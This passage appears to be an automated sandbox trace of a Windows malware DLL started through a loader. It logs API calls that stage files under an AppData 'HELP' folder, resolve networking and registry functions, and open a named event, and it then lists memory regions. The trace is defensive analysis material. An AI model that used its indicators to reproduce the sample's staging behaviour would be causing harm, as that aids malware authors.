GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.355] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.355] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.355] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.355] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.355] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.355] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.355] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.355] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.355] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.355] GetLastError () returned 0xb7 [0035.355] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.355] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.356] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.356] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.356] wsprintfA (in: param_1=0x30f718, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.356] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.356] wsprintfA (in: param_1=0x30f614, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.356] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.356] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.356] CloseHandle (hObject=0x74) returned 1 [0035.356] GetLastError () returned 0x0 [0035.356] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.356] GetLastError () returned 0x0 [0035.356] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.356] GetSystemDirectoryA (in: lpBuffer=0x30f718, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.356] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.356] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.356] CloseHandle (hObject=0x74) returned 1 [0035.356] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.357] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.357] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.358] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.358] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.358] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.358] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.358] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.358] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.358] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.358] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.358] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.358] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.359] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.360] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.360] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.360] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.360] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.360] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.360] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.360] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.360] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.360] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.361] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.361] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.361] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.361] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.361] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.361] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.361] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.361] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.363] HeapDestroy (hHeap=0x380000) returned 1 Process: id = "56" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb00" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"explorer.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2463 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2464 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2465 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2466 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2467 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2468 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2469 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2470 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2471 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 2472 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2473 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2474 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2475 start_va = 0x160000 end_va = 0x1c6fff entry_point = 0x160000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2476 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2477 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2478 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2479 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2480 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2481 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2482 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2483 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2484 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2485 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2486 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2487 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2488 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2489 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 2490 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2491 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2492 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2493 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2494 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2495 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2496 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2497 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2498 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2499 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2500 start_va = 0x1200000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2501 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2502 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2503 start_va = 0x12a0000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 2963 start_va = 0x1300000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2964 start_va = 0x1470000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 2965 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Thread: id = 118 os_tid = 0xd24 [0035.410] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f704 | out: lpSystemTimeAsFileTime=0x30f704*(dwLowDateTime=0xe2c99850, dwHighDateTime=0x1d3dfba)) [0035.410] GetCurrentProcessId () returned 0xd20 [0035.410] GetCurrentThreadId () returned 0xd24 [0035.410] GetTickCount () returned 0x17f9a [0035.410] QueryPerformanceCounter (in: lpPerformanceCount=0x30f6fc | out: lpPerformanceCount=0x30f6fc*=374262738) returned 1 [0035.410] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.410] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.410] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.410] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.410] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.410] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.411] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.411] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.411] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.411] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.411] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.411] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.411] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.411] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.411] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.411] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.411] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.412] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.412] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.412] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.412] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.412] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.412] GetCurrentThreadId () returned 0xd24 [0035.413] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"explorer.exe\"" [0035.413] GetEnvironmentStringsW () returned 0x77860* [0035.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x12909f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.413] FreeEnvironmentStringsW (penv=0x77860) returned 1 [0035.413] GetStartupInfoA (in: lpStartupInfo=0x30f654 | out: lpStartupInfo=0x30f654*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.413] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.413] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.413] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.413] SetHandleCount (uNumber=0x20) returned 0x20 [0035.413] GetLastError () returned 0x0 [0035.413] SetLastError (dwErrCode=0x0) [0035.413] GetLastError () returned 0x0 [0035.413] SetLastError (dwErrCode=0x0) [0035.413] GetLastError () returned 0x0 [0035.413] SetLastError (dwErrCode=0x0) [0035.413] GetACP () returned 0x4e4 [0035.413] GetLastError () returned 0x0 [0035.413] SetLastError (dwErrCode=0x0) [0035.413] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.413] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f634 | out: lpCPInfo=0x30f634) returned 1 [0035.413] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f100 | out: lpCPInfo=0x30f100) returned 1 [0035.413] GetLastError () returned 0x0 [0035.413] SetLastError (dwErrCode=0x0) [0035.413] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x30f090 | out: lpCharType=0x30f090) returned 1 [0035.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f514, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f514, cbMultiByte=256, lpWideCharStr=0x30ee78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.414] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 